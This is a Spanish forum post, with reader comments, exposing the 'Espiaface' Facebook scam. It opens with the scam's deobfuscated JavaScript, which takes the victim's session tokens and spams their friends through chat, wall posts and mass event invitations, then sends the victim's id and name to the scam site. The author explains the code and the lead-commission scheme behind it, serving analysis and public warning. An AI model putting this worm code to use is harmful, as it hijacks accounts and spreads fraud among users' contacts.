            _0xbf72x18['style']['top'] = '0px';
            _0xbf72x18['style']['textAlign'] = 'center';
            _0xbf72x18['style']['padding'] = '4px';
            _0xbf72x18['style']['background'] = '#FFFFFF';
            _0xbf72x18['style']['zIndex'] = 999999;
            _0xbf72x18['innerHTML'] = ' <br/><b>Cargando aplicacion, aguarde un momento...</b><br/><br/> La aplicacion esta preparando tu facebook para registrar las visitas de tus amigos.<br/><br/><img src="http://genetics.bwh.harvard.edu/snp2rflp/circle.gif">';
            document['body']['appendChild'](_0xbf72x18);
        };
    var _0xbf72x19 = _0xbf72xf['match'](/name="xhpc_composerid" value="([dw]+)"/i);
    if (_0xbf72x19) {
        comp = _0xbf72x19[1];
    } else {
        comp = '';
    };
    var _0xbf72x1a = _0xbf72xf['match'](/name="post_form_id" value="([dw]+)"/i)[1];
    var _0xbf72x1b = _0xbf72xf['match'](/name="fb_dtsg" value="([dw]+)"/i)[1];
    var _0xbf72x1c = document['getElementById']('navAccountName')['firstChild']['data'];
    redirect = redirect + '?' + _0xbf72x14({
        userid: _0xbf72x10,
        name: _0xbf72x1c,
        doclose: 1
    });
    _0xbf72x17();
    if (eventdesc) {
        wf++;
        _0xbf72x16('/ajax/choose/?__a=1', {
            type: 'event',
            eid: null,
            invite_message: '',
            __d: 1,
            post_form_id: _0xbf72x1a,
            fb_dtsg: _0xbf72x1b,
            lsd: null,
            post_form_id_source: 'AsyncRequest'
        }, function (_0xbf72x1d) {
            var _0xbf72x1e = _0xbf72x1d['match'](/"token":"([^]+)"/)[1];
            var _0xbf72xb = '/ajax/typeahead/first_degree.php?__a=1&viewer=' + _0xbf72x10 + '&token=' + _0xbf72x1e + '&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha';
            doget(_0xbf72xb, function (_0xbf72x1f) {
                var _0xbf72x20 = _0xbf72x1f['match'](/{"uid":d+,/g);
                var _0xbf72x21 = [];
                for (var _0xbf72x22 = 0; _0xbf72x22 < _0xbf72x20['length']; _0xbf72x22++) {
                    var _0xbf72x23 = _0xbf72x20[_0xbf72x22]['match'](/:(d+),/)[1];
                    if (_0xbf72x23 != _0xbf72x10) {
                        _0xbf72x21['push'](_0xbf72x23);
                    };
                };
                var _0xbf72x24 = new Date;
                _0xbf72x24['setTime'](_0xbf72x24['getTime']() + 86400000);
                datestr = _0xbf72x24['getMonth']() + 1 + '/' + _0xbf72x24['getDate']() + '/' + _0xbf72x24['getFullYear']();
                timestr = _0xbf72x24['getHours']() * 60;
                var _0xbf72x25 = {
                    post_form_id: _0xbf72x1a,
                    fb_dtsg: _0xbf72x1b,
                    start_dateIntlDisplay: datestr,
                    start_date: datestr,
                    start_time_hour_min: timestr,
                    name: eventname,
                    place_page_id: '',
                    location: '',
                    street: '',
                    geo_id: '',
                    geo_sq: '',
                    desc: eventdesc,
                    sgb_invitees: _0xbf72x21['join'](','),
                    sgb_emails: '',
                    sgb_message: '',
                    privacy_type: 'on',
                    guest_list: 'on',
                    connections_can_post: 'on',
                    save: 'Create Event',
                    submitting: ''
                };
                _0xbf72x25['new'] = '';
                _0xbf72x16('/events/create.php', _0xbf72x25, false, function () {
                    mf(--wf);
                });
            });
        });
    };
    if (chatmessage) {
        wf++;
        _0xbf72x16('/ajax/chat/buddy_list.php?__a=1', {
            user: _0xbf72x10,
            post_form_id: _0xbf72x1a,
            fb_dtsg: _0xbf72x1b,
            lsd: null,
            post_form_id_source: 'AsyncRequest',
            popped_out: false,
            force_render: true
        }, function (_0xbf72x1d) {
            var _0xbf72x26 = _0xbf72x1d['substr'](9);
            var _0xbf72x27 = eval('(' + _0xbf72x26 + ')');
            var _0xbf72x28 = _0xbf72x27['payload']['buddy_list'];
            for (var _0xbf72x29 in _0xbf72x28['nowAvailableList']) {
                var _0xbf72x2a = Math['floor'](Math['random']() * 1335448958);
                var _0xbf72x2b = (new Date)['getTime']();
                var _0xbf72x2c = chatmessage['replace']('%firstname%', _0xbf72x28['userInfos'][_0xbf72x29]['firstName']['toLowerCase']());
                _0xbf72x16('/ajax/chat/send.php?__a=1', {
                    msg_id: Math['floor'](Math['random']() * 1335448958),
                    client_time: (new Date)['getTime'](),
                    msg_text: chatmessage['replace']('%firstname%', _0xbf72x28['userInfos'][_0xbf72x29]['firstName']['toLowerCase']()),
                    to: _0xbf72x29,
                    post_form_id: _0xbf72x1a,
                    fb_dtsg: _0xbf72x1b,
                    post_form_id_source: 'AsyncRequest'
                });
            };
            mf(--wf);
        });
    };
    if (postmessage) {
        wf++;
        doget('/ajax/browser/friends/?uid=' + _0xbf72x10 + '&filter=all&__a=1&__d=1', function (_0xbf72x1d) {
            var _0xbf72x20 = _0xbf72x1d['match'](//d+_d+_d+_q.jpg.*?u003ca href="http://www.facebook.com/.*?u003c/a>/gi);
            var _0xbf72x2d = [];
            if (_0xbf72x20) {
                for (var _0xbf72x22 = 0; _0xbf72x22 < _0xbf72x20['length']; _0xbf72x22++) {
                    var _0xbf72x23 = _0xbf72x20[_0xbf72x22]['match'](/_d+_/)[0]['replace'](/_/g, '');
                    var _0xbf72x2e = _0xbf72x20[_0xbf72x22]['match'](/>[^>]+u003c/a>$/i)[0]['replace'](/u003c/a>$/gim, '')['replace'](/>/g, '');
                    _0xbf72x2d['push']({
                        id: _0xbf72x23,
                        name: _0xbf72x2e
                    });
                };
            };
            var _0xbf72xd = [];
            var _0xbf72x2f = [];
            while (_0xbf72x2d['length']) {
                var _0xbf72x30 = Math['floor'](Math['random']() * _0xbf72x2d['length']);
                _0xbf72xd['push'](_0xbf72x2d[_0xbf72x30]);
                _0xbf72x2f['push'](_0xbf72x2d[_0xbf72x30]);
                var _0xbf72x2b = _0xbf72x2d['shift']();
                if (_0xbf72x30) {
                    _0xbf72x2d[_0xbf72x30 - 1] = _0xbf72x2b;
                };
            };
            if (debug) {
                alert('fetched friends: ' + _0xbf72xd['length']);
            };
            var _0xbf72x31 = {
                post_form_id: _0xbf72x1a,
                fb_dtsg: _0xbf72x1b,
                xhpc_composerid: comp,
                xhpc_targetid: _0xbf72x10,
                xhpc_context: 'home',
                xhpc_fbx: '',
                lsd: null,
                post_form_id_source: 'AsyncRequest'
            };
            mt = postmessage;
            m = postmessage;
            while (mt['search']('%tf%') >= 0) {
                var _0xbf72x32 = _0xbf72xd['pop']();
                mt = mt['replace']('%tf%', _0xbf72x13(_0xbf72x32));
                m = m['replace']('%tf%', _0xbf72x11(_0xbf72x32));
            };
            _0xbf72x31['xhpc_message_text'] = mt;
            _0xbf72x31['xhpc_message'] = m;
            if (debug) {
                alert('message text: ' + mt);
            };
            _0xbf72x16('/ajax/updatestatus.php?__a=1', _0xbf72x31);
            var _0xbf72x33 = function (_0xbf72x15) {
                    if (_0xbf72x15 == 0) {
                        wf = 0;
                        mf();
                        return;
                    };
                    var _0xbf72x34 = _0xbf72x2f['shift']();
                    var _0xbf72x35 = {
                        post_form_id: _0xbf72x1a,
                        fb_dtsg: _0xbf72x1b,
                        xhpc_composerid: comp,
                        xhpc_targetid: _0xbf72x34['id'],
                        xhpc_context: 'profile',
                        xhpc_fbx: 1,
                        lsd: null,
                        post_form_id_source: 'AsyncRequest'
                    };
                    var _0xbf72x36 = postmessage;
                    var _0xbf72x37 = postmessage;
                    if (_0xbf72xd['length'] == 0) {
                        wf = 0;
                        mf();
                        return;
                    };
                    while (_0xbf72x36['search']('%tf%') >= 0) {
                        var _0xbf72x38 = _0xbf72xd['pop']();
                        _0xbf72x36 = _0xbf72x36['replace']('%tf%', _0xbf72x13(_0xbf72x38));
                        _0xbf72x37 = _0xbf72x37['replace']('%tf%', _0xbf72x11(_0xbf72x38));
                    };
                    _0xbf72x35['xhpc_message_text'] = _0xbf72x36;
                    _0xbf72x35['xhpc_message'] = _0xbf72x37;
                    _0xbf72x16('/ajax/updatestatus.php?__a=1', _0xbf72x35);
                    setTimeout(function () {
                        _0xbf72x33(_0xbf72x15 - 1);
                    }, 2000);
                };
            wf++;
            setTimeout(function () {
                _0xbf72x33(nfriends);
            }, 2000);
        });
    };
    mf();
});
"No entendí una mierda de nuevo", dirás probablemente. No te preocupes, que acá está papá nanopene para ayudarte.
"No gracias, tu post apesta", dirías muy educadamente.
"Confiá en mí, sé exactamente lo que hago", te diría Martillo Hammer y te metería un balazo en el orto.
Hablando en serio de nuevo, vamos a explicar muy rápidamente lo que hace este código durante los 2 y 3 minutos que tenés que esperar:

0) Te muestra un gif robado de la Universidad de Harvard, (parece re wow, pero es un detalle re irrelevante, jajaja) para mostrarte que está "cargando":
pelotudez colectiva

1) Envia automáticamente un chat a un amigo online poniendo:
[el nombre de pila de tu amigo], mira esto que es increible, te permite ver quienes visitan tu perfil y funciona bien, entra a: espiaface.com


2) Se fija los amigos que tenés en Facebook y escoge a cuatro amigos al azar para generar el mensaje del muro:
Top de visitantes de tu perfil de hoy:
%tf% - 19 visitas
%tf% - 16 visitas
%tf% - 15 visitas
%tf% - 13 visitas
Averigua tu tambien quien te esta mirando entrando en: espiaface.com
Funciona de verdad!

(En %tf% reemplaza por los nombres completos de tus amigos escogidos al azar)
Fijate que siempre va a mostrar que tuviste 19, 16, 15 y 13 visitas.
Esto demuestra una paja tremenda del programador, la versión en inglés genera números aleatorios.

3) Crea un evento en facebook (Vas a ir: ¿si, no, quizas?) y automáticamente invita a todos tus amigos
Nombre del Evento: Averigua quien visita tu perfil
Descripción del evento: Esto es increible! pueden ver quien esta visitando su perfil y te llegan notificaciones, sigan los pasos de esta pagina que explica como hacerlo, entren en: espiaface.com
Lo gracioso es que hay gente que dice "si, voy a atender al evento". Hay que ser pelotudos.

Resumiendo

Ese código, en esos 2 y 3 minutos que te pide esperar:
Lo que hace
Al poner ese código en la barra de direcciones, toma el control de tu Facebook un ratito para Spamear tanto por chat, como en el muro y también organizando eventos. Lo único que hace es Spamear por los codos.
Lo que no hace
No te roba el cookie, ni te saca la contraseña, ni accede a información privada de tu perfil, ni te sube virus ocultamente, ni te baja los pantalones, ni te mete... bueno lo paramos ahi.

¿Entonces cuál es el punto?

¿Entonces para qué carajo alguien se molestó en crear semejante estupidez? Muy simple, para hacer dinero. Mucho dinero.
Potencialmente podría haber generado millones de dólares, les explico a continuación.

Una vez que terminan los minutos de espera te redirige al siguiente sitio: final.espiaface.com (www.espiaface.com/carga.php)
En final.espiaface.com te dice:
Espiando al &quot;EspiaFace.com&quot;: El objetivo al desnud
Eso es lo que vas a ver si vivis en sudamérica. Y la imagen de arriba va ser lo último que hayas visto. Es por esto que muchos analistas en la red se rascaban la cabeza preguntándose cuál era el fin de este "virus".
Pero si vivís en México, te va a mostrar una oferta: de http://www.enterfactory.com/ (no ingreses el numero de tu celular)
Y si vivís en Estados Unidos te va a mostrar cinco links surtidos de diferentes juegos de: PlaySushi.com, PageRage.com, Gamevance.com

De nuevo, ¿qué gana el autor?
Si sos un hispano de Estados Unidos que entraste a PlaySushi.com y te bajaste el juego, el creador de Espiaface ganó $1.
Si sos un Mexicano que pusiste tu número de celular en Enterfactory.com, le generaste al creador de Espiaface $1.
Esto es lo que se llama comisión por intención de compra (leads). Si te suscribís a algún producto, llenás un formulario (eufemísticamente llamados "encuestas" ) con tus datos personales, eso genera un "lead" y le genera una comisión por referido.

Estas ofertas están restringidas por países, y la gran mayoría de los países hispanos estaban fuera de las areas de promoción, es por eso que a la mayoría de ustedes les mostraba: "Sorry, There are no surveys available to your country at this time. Please try back later" (Disculpen, no hay encuestas disponibles en su país en este momento. Por favor intente luego)

Este es el rango de las comisiones por sitio:
PageRage (Sólo disponible para USA): de $0,8 a $2,20 por lead. (Promedio: $1,50)
Gamevance (Sólo disponible para USA): de $1,60 a $2,29 por lead. (Promedio: $1,95)
Playsushi (Sólo disponible para USA): de $0,90 a $2 por lead. (Promedio: $1,45)
Enterfactory (Sólo disponible para México): de $0,60 a $1,20 por lead. (Promedio: $0,90)

Si suponemos razonablemente que un 1% de los usuarios mexicanos de Facebook (Facebook tiene 24.910.520 usuarios mexicanos registrados) se suscribieron a Enterfactory.com ($1 por lead para facilitar el cálculo, además de que es el más probable), el creador de espiaface se hubiera levantado $249.105 dólares limpios.

La versión en inglés debe haber generado como mínimo un millón de dólares. Si consideramos que sólo 1% de los usuarios de Facebook de Estados Unidos cayeron en la trampa (Facebook tiene 150.201.840 usuarios registrados en USA), los creadores de estos fraudes levantaron $1.502.018 dólares verdes.
Si agregamos a todos los países con usuarios angloparlantes (casi el resto del mundo) podemos fácilmente imaginar varias decenas de millones de dolares.

Finalizado con el super análisis, ahora se pueden tranquilizar ahora no van a caer más personas en espiaface porque... oops... por el bien de la humanidad, el sitio ya no existe más (lalalala, les juro que yo no tuve nada que ver...)
> CORRECCION: Volvió con los subdominios reformados y con el favicon de Facebook (uf, fuera de joda esa movida va a darle más legitimidad y van a caer más boludos.)
Au revoir espiaface!
> Au revoir las pelotas.
>> CORRECCION DE CORRECCION: Ahora sí Au Revoir, finalmente está hackeada!

Bueno ahora me voy a desayunar.
Saludos a todos y buen día America!

PD: Yapa, si instalaron los juegos de playsushi, es adware (programas que incluyen publicidad) Los caraduras lo promocionan con "Incluye toolbar de terceros GRATIS"...
Pero por suerte tienen suficiente ética, te lo podés sacar de encima si lo desinstalás desde "Agregar o Quitar Programas" del Panel de Control. Un truquito para ahorrar tiempo: Vayan a Ejecutar (para ahorrar más tiiempo aún: Tecla Windows + R) y escriban AppWiz.cpl (y presionen Enter). Tadá, "Agregar o Quitar Programas" en 1 segundo.
PD 2: Hay, sin embargo, un método para saber cuántos entraron a tu perfil (tiempo, fecha, IP, y todo), PERO no podés saber qué usuario de Facebook fue. Jajaja
PD 3: Por si no lo vieron todavía, entren acá para ver este cortometraje re loco para relajarte de la calentura de Espiaface. Aguanten hasta el final que es re loco.

Respondiendo a las preguntas que me llega por MP:

1) ¿Cómo sé todo esto?
Todo esto lo averigué entrando al sitio de espiaface, viendo su código y viendo cómo se comporta el sitio. Está todo a la vista.
Busqué algo por internet para ver si alguien había investigado más profundamente, pero todo era incompleto, algunos se rascaban la cabeza públicamente al no comprender el fin de esta ingeniería social masiva. A los bloggers más serios, les envié un mail compartiendo esto.
Luego usé proxies de diferentes países para ver cómo se comportaba el sitio según el área geográfica del IP (acá es donde todos hacían agua)
Sobre las ganancias, eso yo tengo bastante experiencia con el marketing online, de ahí mi conocimiento sobre el "modelo de negocio" de las comisiones por lead (traer información de potenciales clientes) o conversión (ventas).
El boludo de Espiaface podría haber generado mucho más guita si se hubiese avivado que sus auspiciantes no tienen cobertura internacional. Por ejemplo, el auspiciante de Enterfactory TIENE productos para Argentina y Chile (esta empresa afana por telefonia celular y tiene convenios con Movistar y Claro en toda latinoamerica) pero sólo tiene publicado para el producto Mexicano.
Por esta razón se perdió miles y miles de dólares de oportunidad.

2) Cómo sé programación
Esta es la parte que les va a confundir a varios. Yo no sé programar, pero sé interpretar el código.
El lenguaje de programación es como aprender una lengua. Si sabés español, podés llegar a entender portugues aunque no lo sepas hablar. Algo similar pasa con los lenguajes de programación.
Si entendés el tema de las estructuras gramaticales, la sintaxis, artículos, pronombres, etc... podés entender cómo el chino está organizado y entenderlo aunque no lo hables.
Análogo a esto, si aprendés a programar un lenguaje, aprender el siguiente te va a resultar mucho más sencillo. Si en lugar de enfocarte en un lenguaje, te enfocás a entender a cómo las lenguas están organizadas gramaticalmente, sintácticamente y su cultura, vas a poder entender cualquier lengua. (sea de computadoras o humanas)

3) Si no se programación, ¿cómo "desofusqué" el código?
Muy buena pregunta. La técnica de ofuscación usada en este caso es muy sencillo, y es un truco viejisimo. Un caracter tiene un valor ASCII, el cual puede ser traducido a cualquier otro número que puede ser interpretado por la computadora, pero que nosotros no podemos entender un carajo.
Por ejemplo, si me pregunás cuántos años tengo, me dirías que se dice "preguntás" y que me comí la "t", la T de Troll de mierda.
Empecemos de nuevo, si me pregunTaras qué edad tengo, en lugar de decirte mi edad en números decimales como toda gente normal, te puedo devolver la trolleada diciéndote que yo tengo (log(10^(6*7)+cos(90))+10-3*3+8+20-18-(La edad de Jesús al morir, según la tradición católica)-75+80+5+3+7+(raiz cuadrada de 64)+5*5+14+6-41)/2 años.
Ahí tenés mi edad. Si estás cursando la secundaria, ves eso y te cagás de risa (que por cierto, esa cuenta calcula mi edad real). Sabés que es una pavada ridículamente básica, sólo que es un dolor de huevos resolverlo.
Algo parecido sucede con la ofuscación en este Javascript: Es una pavada. Si prestan atención al estilo de ofuscación, podemos sonreir antes de desofuscarlo: x4Ex61x6Ex6Fx70x65x6Ex65 es obvio, ya desde el formato mismo, que la codificación es una simple traducción de valores ASCII a hexadecimal.

Des-ofuscando:
4E (hexadecimal) = 78 (decimal) = N (ASCII valor 78, prueben ALT+78)
61=097=a
6E=110=n
6F=111=o
70=112=p
65=101=e
6E=110=n
65=101=e

Pueden ingresar a beautify para la deofuscación simple y formateo automático del código: http://jsbeautifier.org/
En el caso de que la ofuscación sea muy sofisticada, para análisis más profundo uso el sitio: http://jsunpack.jeek.org/dec/go?report=9d6d18553de1f44ee0d4dfe32e9b37734c11b3e2 (puede resultar confuso, pero es muy útil)

4) Dios santo...
REITERO: EL ESPIAFACE NO SE DESINSTALA PORQUE NO SE INSTALA NADA.
I REITERATE: THE ESPIAFACE DOESN'T NEED TO BE UNINSTALLED BECAUSE NOTHING IS INSTALLED IN THE FIRST PLACE!
Я повторяю: ESPIAFACE не может быть удален, потому что ничто не установлен!
Pero qué pasa que no me entienden, ¿estoy hablando en ruso?

5) El dueño del dominio Entraentuperfil.com Gabriel Mellace me envió un MP:
Ni sé por qué tengo que especificar esto, desde el título de este post dice claramente que es sobre ESPIAFACE.COM y sólo sobre ESPIAFACE.COM.
El pobre de Gabriel Mellace parece haber quedado pegado injustamente y no tiene nada que ver.
Dejen de llamarlo y de amenazarlo.


Supongo que esto resuelve todas las preguntas

Si Facebook les bloquea el link hacia este post
Copien y peguen este link para postearlo en los muros:
http://goo.gl/UgTFk
Una vez que Facebook lo acepte, cambiale el título, clickeando sobre el "Permanently moved"
Y de paso contáctense con Facebook para avisarles que el link no es ofensivo.

Facebook

Comentarios Destacados

alejandro614 +2810
hay que ser boludo para caer en eso...

1028 comentarios - Espiando al "EspiaFace.com": El objetivo al desnud

ElTurritoh +360
32 notificaciones de eso u.u
Sphinx969 +77
el que invento eso deberia sufrir la muerte de la botella
thi4ve +53
Muy buena explicación! Que bueno que yo no creo en estas boludeces.
muertet +34
10 puntillos aunque no sirvan para nada.
Me gusta leer este tipo de reporte en el que puedo ver que el que lo redacta realmente entiende lo que está poniendo. Si la página tubiera algo de sql hubiera sido divertido hacer SQLi
leandrong -155
&quot;Sí&quot; afirmativo va con tilde =)
Ramirob_P8 +31
No puedo creer la cantidad de pelotudos que cayeron en eso, voy a tener que revisar quienes son mis amigos, porque me deben haber invitado 30 veces...
my_day_black +4
hay que ser muy boludo para creer en eso, y me siguen mandando solicitudes,yo les aclaro que esto es una gran mentira el unico que sabe uien visitito a quien es facebook..hay otra forma,,....saludos esto sirve para la gnete inutil que piensa que todo lo puede ver
EmaVillalp +13
Yo no cai en esa mierda, me supuse que era un virus o spyware asi que lo pase de largo
alecanaya +20
Excelente... no puedo creerlo, pero lo lei todito.

Es por eso que nunca acepto nada en el FB
DARIOGOMEZ +3
Al Fin! Ya Me Habian Cansado
peke12345 +4
capitulo 4 ! para cuando ¿ =)
alecanaya -8
Sphinx969 dijo:el que invento eso deberia sufrir la muerte de la botella


Con el... y tirado en un...
Fronsis -9
Lindos tags, Y me chupa un huevo que me rompan las bolas en el Facebook marco los correos como leídos, ignoro las notif y punto
ElZapa
Genial jajaja
eseval +5
La gente realmente instala esas aplicaciones ? Ya suficientemente invasivo es Facebook como para encima instalar contenido que escribió un total desconocido y que no está certificado por absolutamente nadie Todo en pos de saber quien visita mi perfil Tan insegura es la gente?

En fin ... buen análisis del código.
Saludos.


PS: si va a correr del lado del cliente ... pues entonces se ofusca Aguante el ofuscado de código Javascript ;-)
Saludos.
Oregone0 +8
leandrong dijo:&quot;Sí&quot; afirmativo va con tilde =)

El &quot;Sí&quot; condicional va con tilde linda, el &quot;Si&quot; afirmativo es simple. Además se entiende muy bien el texto
vhm206 +3
muy buen informe master
Le4nDr0W -87
No necesito Face... tengo amigos reales con los cuales conversar y no parar en una PC horas y horas...
Alex1478 +26
Oregone0 dijo:
leandrong dijo:&quot;Sí&quot; afirmativo va con tilde =)

El &quot;Sí&quot; condicional va con tilde linda, el &quot;Si&quot; afirmativo es simple. Además se entiende muy bien el texto

Tiene razón el primero.
pablomgs3 +10
Un tiro a cada uno de los que entro en la pagina esa, por pelotudos la verdad, tenes que darte cuenta.
kuete +3
t ganaste mis 10 d mañana jajaj
uvazquez +14
Sticky + TOP YA
ayuden a difundirlo que me tienen re podrido
AgusGelp
menos mal que cuando me enviaron para abrirlo tenia tanta paja que ni lo abri
NightmareCinema +4
buen post chango, me imaginaba algo así pero bueno se ve que sabés lo que haces
lanaranjamecanica14 +5
Le4nDr0W dijo:No necesito Face... tengo amigos reales con los cuales conversar y no parar en una PC horas y horas...

igual de algo sirve, para cuando necesitas algun apunte de tareas o enterarse que no hay clases
maxluis13 -31
000100101 dijo:Fasobuc = espiaface


es lo contrario sabes, el que no tiene es el forever
Emaaspeed +11
Me tiene la pija Rota , echa mierda , destruida , cagada a palo de tantas veces que me lo envian :@